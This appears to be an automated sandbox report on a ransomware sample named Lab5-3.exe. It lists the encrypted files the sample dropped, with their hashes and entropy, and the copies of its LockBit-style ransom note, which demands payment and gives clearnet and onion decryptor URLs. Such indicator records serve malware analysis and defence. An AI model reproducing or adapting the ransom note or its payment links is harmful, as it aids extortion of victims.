                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41376
                                                                                                          Entropy (8bit):7.995679833125663
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:N+nshWAPdiQKBOADh4rkRtu7bwmyQDee2fsGFhIguH5qsrfyDiHUxPFnOp0FRlbs:gnsoAPsyAGrkRtKYDgee5qsrKDi0xMSK
                                                                                                          MD5:4BBCABC5CEF21702F7EE32156008DE6B
                                                                                                          SHA1:90A674946C13179DE6B905B4CE2F2F30E25A047C
                                                                                                          SHA-256:55F6A16A673138F2108BB3399BE647E72C7D5FD1F1F7BDEC433CFE79161E1A27
                                                                                                          SHA-512:134A9B603E5B47C008102B07BCE9C3B0BF6E1EA9618310E5DC0562586FA6149CF5EFDCB2AB18639DC38CA4263445F4574F4221657BAB678511495A808DBCC0CC
                                                                                                          Malicious:true
                                                                                                          Preview:'>...U.DW..s.I#.......|.-L.d.v=...S..*.UZ...6$..x...LN...$......q...i...]\G.. ..m...._@.5?.f.|....Z|.fS...uA<d.....a:S.h....$\.V..G@......:..f#......|,N..Q..*!3.......I..30P]."h.-Y..x.Q..w..#.....T............0..n8:...Nm.S...F.....UIx....j....7...8.........>..0.E..A|.6.6..d.LT.Px7..W...K:...{{4`.l`u....M..z....5C..$p8.=5?..e...L....3..U.6d..2@.0[..,d.Df.y]E.f...|.;.......!.o....KpZ..B...a0}.W.a].F*HUk....~7~.......L....A.V.T.J.qI.AU..9.f.T.V-bZs../E#pw-M...U..m..[@.&....P...J.Q<.,+.1Q40.._.M..m.._>x...:c.d...P.\k...p.~7...4.y]..+C.\*.n.-...=H........|k...A..O\...'.$..@.Y......s.....i........~l..sbT......Y%&...G...U).....6.1pM.......R.........)..&.2m..x/.R.b...ACO....`.@f..9.Z!..h. .X..F`7.>#...._..&..(..S.r.s$.....V..q.AG3.Q.A..%..KhzW. ..X....v"...).3..G...>'*u..Brd....|.-y.@..f.......{.^......E.8$.1.H..=)l...z....|l.$.u._.-..Xz]o......Eh.s..soVl.^.4..T.x..L....c'....Xf..L.A.O.......z.g:...O..pQFN&..h.z#?P....?./....V.}.Uj..q.r9.F@.f.+<J.xw.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38544
                                                                                                          Entropy (8bit):7.994703496704201
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:W6Sbv+7ZBBBARxiUwwfcBwtlogon1zeGohwk+w9GOdf/jVBsv6tfBXbIZ:33ARoUbDljrakMyf/jVuv20Z
                                                                                                          MD5:67269CAF5114415E3A5DEB46E3ACEB72
                                                                                                          SHA1:E8463325DB08ADDEF1960FAFA556F7B95D232C61
                                                                                                          SHA-256:86210010623C5A649943507FCC7A8063CCE12C78E08DB5784DA0F4E5106439F0
                                                                                                          SHA-512:B8991957394B62474EF1D16DC44EC62F16605B3CB5C89F24F592647EEAE92428A9E2735536CAA6056BE655EE80A0A499440CEF3F82D9469186E673EC7F45710C
                                                                                                          Malicious:false
                                                                                                          Preview:a..;...%.0.)n..a._<...?.h..2.a.P.X....].I|W.X3.m`..A..H".U^....Z.4^.a.R1..}.._..|..|/..7-...."...g...v....h.e'";q...J....m....z(.....u.(=..L.vp..,.....?..VuG'...I..Q...".V-.9...O9.........f8[...a._...._;.6{.PN.V.%S4Gi..2....U..j...|m'.lBn..-...Vo...?6..d../..]7... 2C.l..%$.6.).u.hKF.LO.M........t..Q...2...&.>.....T.._i....x....x....,.T.q...P....\O.r......F:.z.@.X9....1.N..*...0.....*..ppe...".z.QltFw<V.o.V....d......|.T....N......7.....D7j.v....L{b8..}.....i...&.....Wqr..p8.F..b..].n.iWP0.v.Y.j|..\}..!u ...<1]Y+A..3.,.S.V....`...(..s.........f...?4+...O!...A...M.A..w_H..[].#."z.......V..}..B}...Ez....pl..p.*99.X....q...(nu.+~{..../...I.S:9.........^S4E*o.y.J..d....Y.c7R,..`h..>..4.W]./.........._...k.g.....W.!..]K../f..D.;,*\...{o..y..n....zD...........Fj.O.....-~.J...g../R.F.e..}......._\..`.m.m..$...bk..fhL...]....R4.3M.~.9.....|.2g%.n8...L.W.W.(9..r..j.%..f.S.-..<..O.X..=.'....l.NN...C..O..l......$....mt.JS.tUrG.....B...x.>.j.'.Kb
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43072
                                                                                                          Entropy (8bit):7.995186139235322
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:lYXsHOeHskN01inIVBLovRwp7DrsR22y3FGcTwlo17b13C2kEPZ4o1Z+/EZ:lZHr0InGoqp7XsR224so1Vy2kELxZ
                                                                                                          MD5:1BE6851360713E467C639AAFFFFC937B
                                                                                                          SHA1:2F1B9B8150F8BE4BC91F5D573F95F9A7F10581DD
                                                                                                          SHA-256:8E264F15301466A72FF903E49A53DE990537B051373DB5FF31E160CB150F28B6
                                                                                                          SHA-512:EF9026E4D017FA5DD2BA609EE64D455C7E849C84B563D3F2FD571C2BA4946D8B50B37006A2559F1A40B4435EE66A9A57AD4C003D4F0E803DE089547E125F576B
                                                                                                          Malicious:false
                                                                                                          Preview:.......F..G..=!Zq{>..XA.e.5..sC.Z6md....@..7..a.w0I.IkpW...v.m.6;...4.'.8..$....!.=F...^Y.d..o.Q<S..T"c..x1....d..k........C..Nd..*...0...Y.=.$..!.. `.[.v.d.&pg.G.9.h..o&...LL.r..0p.......,f...Y.B...as)./A.`mB.....P..E.:.`.F......w:...E:...9 ...wW...........I`..1..o...s.S..Tb..7F7.y...<....9pH.Yh...8...<.Z......W~.5..I.E..>......m...XDN.5.....z.,,+.Mh...0\7l..Q.KV.y.k.b9...'.G.O....H.{...f..l..P1._.)... .T.:...&.ed>}.q.u...J.7..l#.;....c.K..+.AL....}....e.R.\1......X>....B....z..Wp.._p.*$..}..p`+e....".......P..-.u..,.`.T7......^8J........#G?xU.t...B.......kT.R..+...:..r...m.(.1..R....D./...l[.C...`X..,.p....P....s1n^v].]SN.2y.o..pn.W.R..Y..q\D..g........0[..L}.......9..X.qn..S..r.XT.9&.-....8.......e.|~.="...P..B.._...$@.w..>....M...*6:!....,.....o.../;..E...A"z... <D..'...d.T|if.8s..'..a.7.7.>..,.....Z.a.BS.......[3.2.:..a.......z{/AB.....:....KN..3.=.5...\cO$..n.V.b;z.s..z|....L..(.G.R..g{T.OpD...5.VQ.a.~{...a.V.t'.F&.gg].......@..8SjU[~....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):37168
                                                                                                          Entropy (8bit):7.995530648592879
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ef1PTpUhgpQgOKrOxf7f5tkI+Mgw+I/Z6YppmknMX8pFkJtDuP9cRoLZ:iV1QnKy7j1+MgwH/IYpk7XCFkPY9nZ
                                                                                                          MD5:E572235F0DB201E2BAFE7D936058CDBA
                                                                                                          SHA1:A81C5AE925D7A5EA54D43AC935E4BD1DC20196F9
                                                                                                          SHA-256:7A66256897CACFD846A97FED2689A90C97331839D92977BE65A1B065382ECD55
                                                                                                          SHA-512:DF03FCF77CA29B494524EA36F8C0533CCB37513C30F3C5FA1DB1CB0AB2DA781BBC12B6B0B178069EF5D1BEEEA9D7B1D33330BC8FFA903A2FA100BBB1A1F9AFB8
                                                                                                          Malicious:true
                                                                                                          Preview:......>1SP.7.....Ua...g)....d'P.i...9......|..i...$...v..E..-6_*..S..8e...o...k..c .8...'.._%.E.....2..A5.B..I.Xl.. .7$..\..z...{A'..........,d.5..V.........$...9..K".;..!..?inG.`./....*Wrr........E....R.V...`x..H9z..w....9.H..|.......RE..U6.\.w..'...n.........#.O...>....e.....s-.........w..*.,..|..Cz..[P......_.....IB.Y.&.&.....J...y......[.3<V.Hd....6....j.vW...<.Q.J!.]..uX.r}>...8..~H..%u%.A.msL..Q.VJ.1....F...`..`,..JQ...{.d..mZ....P....z..:E.?....m.....h.-%...xt3.N:....I.,..K....|..i].k...t..j.........%..|..n....O^H..aE..E...<.H8..;O)>."Z@v7&.p<...../l.@.R..4.:....B..vM..W.....g;.Cp.2.p.z.>..&=.[V~.u(.....6....{Y....<.q.b`...........=\..$Ev...}~.<-.'Q..Ag...r.......u..[..[G.S...@.k.y.$.P4...C.,....g..u.Z..'....9.>..Q.....C.).q...(....G...}..7Z .u.?.yg..{.b..u..;.....a*.q...\_.."....RE. .3.*...._...vEA.. FO..y%s...hj./.pT....';j*$#.\.v8.u..,D..........P.....Yt.j?......=.`.@.Ta...+...#s.......h..|.lN.&OU.i.7.j..h..P.g.rf...H..Ia.z..7....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14192
                                                                                                          Entropy (8bit):7.988756101768372
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:+zhPQdbND1xP+DTVQ4/Esz8/7WBn2Testb:+G5NpxmDV8s+7wnihZ
                                                                                                          MD5:9A10E81D1E283DCCBCE41C00D8B0C312
                                                                                                          SHA1:1A270293019977D7333B2AF07E31D8FA85F20D5B
                                                                                                          SHA-256:1CC0B0037AB0C95B4CD6B21715C9FB0F4474E7864A3CFF046886B09E7A2D9572
                                                                                                          SHA-512:F2A01DDD72118DD5E3FD5350E0CBD6F408D661ACDEFA804734162CAD9D6CFFA2FFFD1F69CDCFEB9A16302427F39F7742EF5CE2EC486862B909420D2DC65F7B5C
                                                                                                          Malicious:false
                                                                                                          Preview:oH6.........$.{.Z'I.......G#..z..`.4...M-.].y.6.\.=..t=(...d.[.V1B.....Ej.>..D/Y?=r..VM...Zn.L.[YUeED..g.<..&l.S)NT..3.~KKE....8........2.r(f..;g.U...i...`.B.}t..U....H3}..;...f/_..];c."...oY...m.~....q....[..Yrn..........qU..'Y.~p0X.......1f..`&#..C...9.qj..z....*.. ..C.`%M...*.3pB...C.K=....<.b1H.T......f..n..F..]..>b..u4.e./0.c....Bj....d].."..K....%w..^.....0.......s.^.)K@..2....0....m.KNP...&..-.6B~F........7.{~:..[..y.....(.....6.0..FY%.y....2PB.;.&#G.....L....|.Q{.@.&....wG..W....z.la.V.@..Xn..w..."..z.....VM.1....y.N.]7.>b...b>.=.9....<%..$.....IY'T&..g2`.-.K'..f..I....Dym.....=......*.b.\^.....-.Y.......:...2`......^V..X.Xg...$..t7.w...0.....R2.p......6fq.....B.k?W@.....-K^.'Mo.....Q.bf......f....=.pM.w..P39Xm.L{..)..T.zN.<..X0V.3.DpV.4.y........9....x..5..`..V.O........Uq\.Q.G.Z.....c..v./.=....."w.Y.Me;.>].Ou...E...{Om...\\..{...4.....}h.w....C&.r..f.m.e..w$.....r..l..W.... N../ta!..MG...n.M...k..5.#.....8...[W....!t1...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):37168
                                                                                                          Entropy (8bit):7.994955025795496
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:/db9OoAKld91Hrz4JKCu/C8xLRRmXFSF1t/XbdyWXxNpg0OumrFitZ:/uidv4nu/FxLHmXwF//pyWxZOurtZ
                                                                                                          MD5:554C722835AD02E35953A4E587DD8F80
                                                                                                          SHA1:BE311C4D297954D1379A1CC8EAB724A00F8244FC
                                                                                                          SHA-256:27329F8E38D9192C31D40F3FB71A79BCB19482021719EF1DEDDC93B44C8B3A56
                                                                                                          SHA-512:9C974175CAA49B3218ACE7173738090D542C0B9BBC8B295B3F7E6AC1FCF830A1716E34B6A00DFD2B4A7FBB95C5B09285FC12DECB814D0041C3647B35E2D0CC82
                                                                                                          Malicious:false
                                                                                                          Preview:...X.w+!.^+.0.(.....xO.=.....QX....._-^..og.4D.[..v..y3.n.w.(..^.<.,Q].....a..x.{..].U....h.%|.;........+...P.]d.Sk0}.v.).;.;:Sm...a.|N..;.<"&zA..*..?..v....S....8Stx...TH........f.........6....q(..GV..\..F6N.....*<.....].....S..gP.6..~..c..u.v.Y....."..T...@@....kJs......8~='. ......%8+d.....;@....o^@...l.3.ki ..tlV.....LW....yL.N.7........M....(.....".0T...-..U...\.V.l.b....F#'.$...C..@.1...tz./.....On...":...=...b...e..c..0H..+..A>;iY...kp..j..N.......sv`....;I.4I.....P......%Q.&.T.I.. )..ul..Z.0 .:.9aM..!.l4..@.*"..=.P<T.......nd.e].?.zB...{...OZ..)........J.G"O.....1.$*..]...C....K..y.ZfYl.....)...q...U.&'.)..<....r.4.`N.[.C.iy..j.L...d.w......S&....P?g...0Z..x4..r.7.....D.$.e..N....z..U...h.B.n._..E...t.X...4.+....Xz.H."....y.P....@...."{..?@..i...w.m.".X.RU.....i.'%I5|w..>.`.......F|.v...8.w./V..iZs..vP...t......'G.........k..04.&5t.N..r~..p. .<....M.XQ.C.e.b....}j.q.I..m..P.Bp.S<.M.....U.......B}T..4.V...EI:w.u.[.0/.$.l.Et...+4[..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):42064
                                                                                                          Entropy (8bit):7.9954934643227356
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:vNOYVU7eysNhaPs1VKR1VhsmX6HpIF6/Xyx9r3VLGyyV70uU82vPNuxZyx+Z:FOt7eys/Itmu6Jiwix9AyyV70G2neckZ
                                                                                                          MD5:6039FF2ADACC9A7618216712B93B13FA
                                                                                                          SHA1:1FD7B0CE1B0553D5AF0BD18F83B8C70EAA6C72B5
                                                                                                          SHA-256:7AA1C675298FD3FACF99E7F5D37DE5640B09F81502C2E512E13FF229BD89C2BE
                                                                                                          SHA-512:C93BA5E5C962F3F4A5D97A053B36A8E1EE4584DEC0E7F62E35F2CD8A3C56E6B354F9974D9E78F22893F3B6AA3E5954CB497BD309D96518523733B9CF3F8EF824
                                                                                                          Malicious:false
                                                                                                          Preview:x.q#.!,P.OKB.\........p.._.DZ..\r.]....;...<K..@e.,..j...".[.........C...4.S.i..m.........VrQhi.z.j'>..'"..j......Q....f!.c.).@.L.-..<.<..!.|.v+........g.t..4........._.....(.Hz...PiG}.o...@.&.2\<w............ .-.KV..b_%.g.vX'.K..M)..?|..[.9.... .w..f.J.zno%?Y.uc..p..."..2...CX&......)H... .?..2......Cl..k..&.."q.,(.x...O....I.k..#..3.h...-.c....L@......$.x....@R#..l...;.....Ml.?...T..z..Cu...Q..^K..4.9 [....r6.....2...4.8.J...c,.*E.w..c.G...?.{jI.q..OD...d..H......v.!.0..#.m....T.....!..b.o$u.j^UL^...O.z}.R. ..^(..9.n1w...s..W..X...\...-..X2KU..`.8......A..2.N=!~..vnSg...N.5.,Up.O..{G.....b+.....tF.;.1T.....k.N.!"...F8?q.n.(.[.'3a3&Z...H.......K...^...deG<E.:..{:..Q.W...tz/{..L.p.>8<_..... Y!W...H..S.V...*.Y.Z!...v2....g~AP...U5.pW...3.S....F.:......0.d.....l.7..x.6?.g....6..D.}. ..\.m..Z.G.U.b.....ryj.|..-..T....;l.qK..<.VG..._.b.0.z. ...".^........i>T/p.....y.=..I.Q....ln..;...n.S...m.m.....O. .!.U.A..u.......i...4.-.+4.*.w.S..I.i.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41520
                                                                                                          Entropy (8bit):7.995123314388759
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ucDRRp6nFVxD6cy8D/zypJ+0qFwh/2QNzjYFDoZ0xVVk5NUOLEEP/Z:u2R36nFVB7DbIJ+x+B2H+0xVV0NUIEEZ
                                                                                                          MD5:8F8A615A9782CDEFD439911C05092784
                                                                                                          SHA1:EE7FF7B88E3246A74492E889BAB27C780A25AE81
                                                                                                          SHA-256:AECAFD06D310EEDDEA13ACE4A2B4512E7F40DA72516FF9908F1272CBCB0A25BE
                                                                                                          SHA-512:6A71FF9118CB409E778B7293DAF635E8BEED773957B04EBDC4B5F641EB1CCEC0179D3C9BB13471F3103DC1578342353BB22E43B9B8AE45E1469565C0B4E0A0C3
                                                                                                          Malicious:false
